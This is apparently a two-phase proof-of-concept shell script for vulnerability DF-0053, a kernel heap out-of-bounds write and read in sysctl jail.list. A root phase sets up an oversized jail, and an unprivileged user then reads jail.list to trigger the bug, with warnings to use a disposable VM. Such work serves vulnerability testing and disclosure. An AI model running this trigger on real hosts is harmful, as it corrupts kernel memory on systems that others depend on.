#!/bin/sh
# DF-0053 PoC run - two-phase.
#
# Phase 1 (root): create a jail with a deep chroot path + max hostname +
#                 a few IPs, so sysctl_jail_list's per-jail formatted line
#                 ("JID <space> hostname <space> fullpath") exceeds the
#                 1024-byte per-jail budget -> unsigned underflow ->
#                 heap OOB write + OOB read.
# Phase 2 (any unprivileged user): read sysctl jail.list -> trigger the bug.
#          NOTE: on a vulnerable kernel this is a kernel heap OOB write, not just
#          a read; run it only on a disposable test VM, never on a shared host.
#
# Usage:  ./run.sh                 # auto-detect: root does phase 1, user does phase 2
#         ./run.sh setup           # phase 1 only (root)
#         ./run.sh trigger         # phase 2 only (any user)
#
# Expected output (bug present): "BUG DF-0053 CONFIRMED: ... OOB READ ..."
# Expected output (fixed kernel): "[-] output (N) <= jlssize (N)" and exit 0.

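set -e
cd "$(dirname "$0")"

# Phase selector. "auto" picks the phase from the caller's uid; "setup" and
# "trigger" force one phase. Anything else is a usage error (previously an
# unrecognised argument silently fell through to the trigger phase).
MODE=${1:-auto}

usage() {
    printf 'Usage: %s [auto|setup|trigger]\n' "$0" >&2
    exit 2
}

case "$MODE" in
    auto)
        if [ "$(id -u)" -eq 0 ]; then
            MODE=setup
        else
            MODE=trigger
        fi
        ;;
    setup|trigger)
        ;;
    *)
        usage
        ;;
esac

if [ "$MODE" = "setup" ]; then
    # Jail provisioning is root-only (see header); fail clearly up front instead
    # of letting setup_jail_v3.sh die part-way through with a permission error.
    if [ "$(id -u)" -ne 0 ]; then
        echo "DF-0053: setup phase must run as root (uid=$(id -u))" >&2
        exit 1
    fi
    echo "=== DF-0053 phase 1 (root): provisioning long-path jail ==="
    # The two arguments size the jail so the formatted jail.list line overflows
    # the 1024-byte budget described in the header; their exact meaning is
    # defined by setup_jail_v3.sh — confirm there before changing them.
    sh ./setup_jail_v3.sh 60 4
    exit 0
fi

# Phase 2. On a vulnerable kernel this performs a kernel heap OOB write, so it
# must only be run on a disposable test VM. Exit status is the trigger's own.
if [ ! -x ./jail_list_trigger ]; then
    echo "DF-0053: ./jail_list_trigger missing or not executable; build it first" >&2
    exit 1
fi
echo "=== DF-0053 phase 2 (uid=$(id -u)): triggering jail.list ==="
./jail_list_trigger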
